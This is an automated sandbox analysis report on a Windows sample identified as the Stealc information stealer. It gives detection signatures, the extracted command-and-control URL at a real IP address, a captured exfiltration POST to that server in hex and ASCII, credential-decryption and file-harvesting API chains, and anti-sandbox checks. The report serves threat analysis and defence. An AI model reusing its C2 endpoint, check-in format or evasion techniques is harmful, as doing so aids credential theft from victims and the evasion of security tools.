Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1538461
MD5:6535a50286893f791f119217511acc32
SHA1:2155f365670366e0839d7231944930ddf60ea32b
SHA256:42944bc940b4e9c0dd2a3f97ab9090005213870edeb8e26fec953afa12140ef2
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 616 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6535A50286893F791F119217511ACC32)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2023298984.0000000004FB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 616JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 616JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.5f0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-21T10:46:59.150628+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.5f0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/fVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php&Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php/Virustotal: Detection: 17%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_005FC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_005F7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_005F9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_005F9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00608EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00608EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006038B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00604910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00604910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_005FDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_005FE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00604570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00604570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_005FED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_005FBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005FDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005F16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00603EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00603EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FF68A FindFirstFileA,0_2_005FF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005FF6B0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 44 38 42 37 41 45 33 39 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 2d 2d 0d 0a Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="hwid"32D8B7AE39294266498721------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="build"doma------GHJKECAAAFHJECAAAEBF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_005F4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 44 38 42 37 41 45 33 39 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 2d 2d 0d 0a Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="hwid"32D8B7AE39294266498721------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="build"doma------GHJKECAAAFHJECAAAEBF--
                Source: file.exe, 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2067248972.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ctionSettingsa
                Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&
                Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php/
                Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpG
                Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
                Source: file.exe, 00000000.00000002.2067248972.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpi
                Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
                Source: file.exe, 00000000.00000002.2067248972.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/f

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008818360_2_00881836
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CE1B70_2_009CE1B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B81B60_2_009B81B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BB91A0_2_009BB91A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C5AAB0_2_009C5AAB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CAAC70_2_009CAAC7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AFAEB0_2_008AFAEB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00986AE20_2_00986AE2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BD37C0_2_009BD37C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C2B650_2_009C2B65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00897C2C0_2_00897C2C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009835B40_2_009835B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092A5D70_2_0092A5D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C95C60_2_009C95C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B9D290_2_009B9D29
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B66B60_2_009B66B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B560C0_2_009B560C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088662B0_2_0088662B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A2F8A0_2_008A2F8A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00990F9E0_2_00990F9E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A7850_2_0094A785
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F1F0B0_2_008F1F0B
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 005F45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: yuntpzro ZLIB complexity 0.9950741505841467
                Source: file.exe, 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2023298984.0000000004FB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00609600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00603720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00603720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\G0YGKKW1.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1887232 > 1048576
                Source: file.exeStatic PE information: Raw size of yuntpzro is bigger than: 0x100000 < 0x1a6a00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.5f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;yuntpzro:EW;dfroebje:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;yuntpzro:EW;dfroebje:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00609860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cf6b3 should be: 0x1d59e5
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: yuntpzro
                Source: file.exeStatic PE information: section name: dfroebje
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD80AD push esi; mov dword ptr [esp], ebx0_2_00AD895E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A6A0B6 push ebp; mov dword ptr [esp], esp0_2_00A6A0E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A8D0B4 push esi; mov dword ptr [esp], ebp0_2_00A8D0C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A8D0B4 push ecx; mov dword ptr [esp], eax0_2_00A8D114
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D28BF push 36DCB21Fh; mov dword ptr [esp], esi0_2_009D2900
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060B035 push ecx; ret 0_2_0060B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA80D5 push 4AAD475Eh; mov dword ptr [esp], edx0_2_00AA80DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3F82D push esi; mov dword ptr [esp], 75B8F8B0h0_2_00A3F8BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00881836 push edx; mov dword ptr [esp], esi0_2_00881862
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00881836 push 74352565h; mov dword ptr [esp], eax0_2_0088189D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00881836 push eax; mov dword ptr [esp], 005B3318h0_2_008818DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00881836 push 657822B6h; mov dword ptr [esp], ebx0_2_008818FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00881836 push 1B19F53Dh; mov dword ptr [esp], ebp0_2_00881903
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00881836 push 66B9D204h; mov dword ptr [esp], edi0_2_00881940
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00881836 push ecx; mov dword ptr [esp], 283310FEh0_2_00881995
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE8866 push 11604F82h; mov dword ptr [esp], edx0_2_00AE88BC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A48840 push edi; mov dword ptr [esp], edx0_2_00A48844
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3B84F push 040D9C91h; mov dword ptr [esp], edi0_2_00A3B86F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3B84F push 120D10D0h; mov dword ptr [esp], ebx0_2_00A3B892
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A6E851 push 71497BEAh; mov dword ptr [esp], edx0_2_00A6E874
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A6E851 push ebp; mov dword ptr [esp], ebx0_2_00A6E8DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00959069 push edi; mov dword ptr [esp], 76488C02h0_2_009590F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00959069 push 596F0992h; mov dword ptr [esp], esi0_2_0095910A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7A9BB push ebx; mov dword ptr [esp], eax0_2_00A7AA05
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CE1B7 push 6FDFE1A9h; mov dword ptr [esp], edx0_2_009CE1F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CE1B7 push edi; mov dword ptr [esp], 7EF82E3Ch0_2_009CE24C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CE1B7 push 39D51FCCh; mov dword ptr [esp], edx0_2_009CE2D1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CE1B7 push 77151DC5h; mov dword ptr [esp], edx0_2_009CE2E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CE1B7 push ebx; mov dword ptr [esp], esi0_2_009CE2FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CE1B7 push 5D3AB117h; mov dword ptr [esp], eax0_2_009CE408
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CE1B7 push eax; mov dword ptr [esp], esi0_2_009CE42D
                Source: file.exeStatic PE information: section name: yuntpzro entropy: 7.954094538527286

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00609860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13421
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D302D second address: 9D3039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F242906E926h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2928 second address: 9D2942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2429065B53h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5360 second address: 9D5364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
